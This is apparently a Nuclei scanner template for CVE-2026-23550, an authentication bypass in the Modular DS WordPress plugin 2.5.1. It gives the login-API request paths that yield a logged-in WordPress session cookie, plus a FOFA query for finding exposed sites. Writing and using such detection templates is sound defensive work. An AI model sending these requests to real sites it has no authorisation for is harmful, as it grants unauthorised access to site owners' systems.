id: CVE-2026-23550

info:
  name: Modular DS - Broken Access Control
  author: DhiyaneshDk
  severity: high
  description: |
    Modular DS = 2.5.1 contains a broken access control vulnerability caused by incorrect privilege assignment, letting attackers escalate their privileges. Exploitation requires no special conditions.
  impact: |
    Attackers can escalate their privileges, potentially gaining unauthorized access to sensitive functions or data.
  remediation: |
    Update to the latest version beyond 2.5.1.
  reference:
    - https://help.modulards.com/en/article/modular-ds-security-release-modular-connector-252-dm3mv0/
    - https://patchstack.com/database/wordpress/plugin/modular-connector/vulnerability/wordpress-modular-ds-monitor-update-and-backup-multiple-websites-plugin-2-5-1-privilege-escalation-vulnerability
  metadata:
    verified: true
    max-request: 1
    fofa-query: body="/plugins/modular-connector/"
  tags: cve,cve2026,wordpress,wp-plugin,wp,auth-bypass,modular-connector,vkev

variables:
  string: "{{to_lower(rand_text_alpha(5))}}"

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php/api/modular-connector/login/{{string}}?origin=mo&type=foo"
      - "{{BaseURL}}/api/modular-connector/login/{{string}}?origin=mo&type=foo"

    matchers:
      - type: dsl
        dsl:
          - status_code == 302
          - contains(header, "wordpress_logged_in")
        condition: and
# digest: 4a0a00473045022100c46495eb5fe71644479d0feb21339e99a6f869f87692322e2e7e35f9068a08be022069850f178d71c1299402fe646c184201d6c22ecce1ba557dd434fcdf5c012e49:922c64590222798bb761d5b6d8e72950